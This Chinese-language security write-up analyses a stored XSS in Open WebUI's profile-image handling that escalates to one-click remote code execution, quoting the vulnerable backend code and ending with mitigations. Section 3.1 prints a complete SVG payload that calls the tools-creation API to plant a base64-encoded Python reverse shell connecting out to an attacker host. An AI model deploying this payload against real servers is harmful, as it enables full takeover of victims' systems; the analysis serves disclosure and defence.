摘要

這份研究報告深入分析了在 Open WebUI(一個開放原始碼的大型語言模型介面)中發現的嚴重漏洞。該漏洞涉及個人資料圖片上傳功能中的儲存型跨站腳本攻擊(Stored XSS),當攻擊目標為管理使用者時,可以將其升級為一鍵遠端程式碼執行(RCE)。攻擊者可利用 data:image/svg+xml URI 架構,繞過傳統的圖片驗證,並在受害者的瀏覽器環境中執行任意 JavaScript。這份報告剖析了底層 Python 後端邏輯,分析了惡意 SVG 的 Payload,並與其他網頁框架中類似檔案處理漏洞進行比較,探討緩解策略。

為什麼 Open WebUI 的 SVG 上傳功能會導致 XSS 並引發 one-click RCE? | 資訊安全新聞

1. 簡介

Open WebUI 是一個受歡迎的自架網頁介面,目的在提供使用者友善的體驗以與各種大型語言模型互動。由於這類平台處理敏感資料並提供廣泛的管理控制,其安全性至關重要。在 2026 年初,發現了一個重大的安全缺陷,允許透過使用者個人檔案設定注入惡意腳本 [1]。與傳統可能只導致 Session 劫持的 XSS 不同,這個特定的實作方式允許攻擊者與 Open WebUI 的內部 API 端點互動,有效地取得建立新工具或修改系統設定的能力,進而導致完整的系統淪陷。

2. 漏洞技術分析

漏洞的核心在於後端處理個人資料圖片 URL 的方式。具體來說,應用程式在處理 data URI 時,未能適當過濾或限制 media_type 。這個疏忽允許納入能夠攜帶嵌入式 JavaScript 的 image/svg+xml

2.1 後端邏輯缺陷

漏洞位於 /backend/open_webui/routers/users.py 檔案中。以下程式碼片段說明了應用程式如何處理個人資料圖片 URL: 

  1. # Analysis of users.py - Profile Image Processing
  2. # This section handles the retrieval of profile images stored as data URIs.
  4. elif user.profile_image_url.startswith("data:image"):
  5.     try:
  6.         # Splitting the header from the base64 encoded data
  7.         header, base64_data = user.profile_image_url.split(",", 1)
  8.         
  9.         # Decoding the base64 string into raw bytes
  10.         image_data = base64.b64decode(base64_data)
  11.         image_buffer = io.BytesIO(image_data)
  12.         
  13.         # Extracting the media type directly from the header without validation
  14.         # Vulnerability: No check if media_type is a safe format (e.g., png, jpg)
  15.         media_type = header.split(";")[0].lstrip("data:")
  16.         
  17.         # Returning the image as a streaming response with 'inline' disposition
  18.         # This causes the browser to render the SVG and execute any embedded scripts
  19.         return StreamingResponse(
  20.             image_buffer,
  21.             media_type=media_type,
  22.             headers={"Content-Disposition": "inline"},
  23.         )

如上述程式碼所示, media_type 是直接從使用者提供的 header 中提取。將此值設為 image/svg+xml 時, StreamingResponse 會指示瀏覽器將內容視為 SVG 文件。由於 Content-Disposition 被設為 inline ,瀏覽器會直接轉譯 SVG,進而觸發其中包含的任何 <script> 標籤。

2.2 攻擊向量與執行流程

此攻擊分為多個階段,從上傳惡意個人資料圖片開始,最終在伺服器上執行 Reverse shell。下圖說明了攻擊順序:

graph TD A[Attacker] -->|Upload Malicious SVG| B(Open WebUI Server) B -->|Store SVG in Profile| C{Database} A -->|Send Phishing Link| D[Admin User] D -->|Click Link| E(Browser) E -->|Request Profile Image| B B -->|Return SVG with Script| E E -->|Execute JS| F[Internal API Call] F -->|Create Malicious Tool| B B -->|Execute Python Payload| G[Reverse Shell] G -->|Connect Back| A

這次 RCE 的「一鍵」特性特別危險。管理使用者只需在已認證的狀態下檢視攻擊者的個人資料圖片(或被重新導向至該圖片 URL),腳本便會在背景悄悄執行,代表使用者執行管理操作。

3. Payload 分析

攻擊者使用了精心設計的 SVG Payload,目的在與 Open WebUI API 互動。主要目標是利用「Tools」建立功能,該功能允許執行 Python 程式碼。

3.1 RCE Payload 結構

以下 Payload 被嵌入於 SVG 中。它的目標是 /api/v1/tools/create 端點,以注入 Python Reverse shell

  1. <svg xmlns="http://www.w3.org/2000/svg">
  2. <script type="text/javascript"><![CDATA[
  3. (function(){
  4.   try {
  5.     // Base64 encoded Python reverse shell payload
  6.     // Decodes to: import socket,subprocess,os;s=socket.socket(...);s.connect(("172.17.0.3",443));...
  7.     var encodedPayload = "aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjE3Mi4xNy4wLjMiLDQ0MykpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtpbXBvcnQgcHR5OyBwdHkuc3Bhd24oInNoIik";
  8.     var decodedPayload = atob(encodedPayload);
  9.     
  10.     var xhr = new XMLHttpRequest();
  11.     // Targeting the tools creation API to achieve RCE
  12.     xhr.open("POST", "/api/v1/tools/create", true);
  13.     xhr.withCredentials = true;
  14.     xhr.setRequestHeader("Accept", "application/json");
  15.     xhr.setRequestHeader("Content-Type", "application/json");
  16.     
  17.     var body = JSON.stringify({
  18.       id: "exploit_tool",
  19.       name: "exploit_tool",
  20.       meta: { description: "Technical Research Tool" },
  21.       content: decodedPayload, // The Python code to be executed
  22.       access_control: null
  23.     });
  24.     xhr.send(body);
  25.   } catch(e) {
  26.     console.error("Execution failed:", e);
  27.   }
  28. })();
  29. ]]></script>
  30. </svg>

這個腳本利用受害者的有效 Session(透過 withCredentials = true )來繞過 CSRF 保護(若實作不當或腳本來自信任的網域(即應用程式自己的網域))。一旦工具建立完成,攻擊者便可觸發其執行,導致 Reverse shell 連線至攻擊者的監聽端。

4. 與其他檔案上傳漏洞的比較分析

Open WebUI 漏洞與其他高關注度的檔案上傳缺陷有共同特性。例如,針對 Ninja Forms (CVE-2026-0740) 的研究指出,對檔案類型驗證不足可能導致 RCE [2]。Ninja Forms 的問題在於可直接上傳 PHP 檔案,而 Open WebUI 的缺陷更為隱晦,使用 XSS 作為通往 RCE 的跳板。

功能/特性 Open WebUI (儲存型 XSS 轉 RCE) Ninja Forms (CVE-2026-0740)
主要弱點 未經驗證的 Data URI 中之 media_type 副檔名/MIME 驗證不足
攻擊方法 帶有嵌入式 JS 並呼叫內部 API 的 SVG 直接上傳惡意 PHP 腳本
使用者互動 需要(一鍵) 不需要(未經認證)
影響 完整系統淪陷 (RCE) 完整系統淪陷 (RCE)

如比較研究所述,兩個漏洞都源於未能實作嚴格的檔案類型 允許清單 。依賴黑名單或未能驗證檔案的實際內容(magic bytes)使得攻擊者能夠使用創意編碼或替代檔案格式(如 SVG)來繞過安全控管 [2]

5. 緩解措施與最佳實務

為有效緩解此漏洞,開發人員必須摒棄以信任為核心的處理使用者提供之中繼資料的做法。建議採取以下策略:

  • 嚴格的媒體類型允許清單: 僅允許安全的圖片格式,例如 image/png image/jpeg image/webp 。明確拒絕 image/svg+xml ,除非將其傳遞給能剝離所有可腳本化元素的嚴格過濾器。
  • 內容安全政策(CSP): 實作強健的 CSP,限制行內腳本的執行,並阻止從不受信任的來源載入資源。
  • 安全的檔案處理: 在提供使用者上傳的內容時,使用 Content-Disposition: attachment header,強制瀏覽器下載檔案而非直接於行內轉譯。
  • 輸入過濾: 使用專門設計來過濾 SVG 檔案的程式庫,移除 <script> on* 事件處理常式以及 <foreignObject> 標籤。

6. 結論

Open WebUI 中一鍵 RCE 的發現凸顯了安全檔案處理的重要性,以及利用 SVG 的 XSS 所帶來的危險。攻擊者透過利用 data URI 處理方式中的一個簡單邏輯缺陷,即可取得伺服器的完整控制權。這項研究強調,技術安全不僅在於阻擋已知的惡意輸入,更在於嚴格定義並強制執行「已知良好」的參數。隨著網頁應用程式持續整合客製化工具與 LLM 介面等複雜功能,攻擊面也隨之擴大,因此必須採取縱深防禦(Defense-in-depth)的安全方法。

參考資料

  1. Open WebUI - Stored XSS via File Upload That Leads to RCE with 1-Click
  2. 你的 WordPress 網站正在洩密嗎?Ninja Forms 檔案上傳漏洞讓攻擊者無需密碼即可上傳後門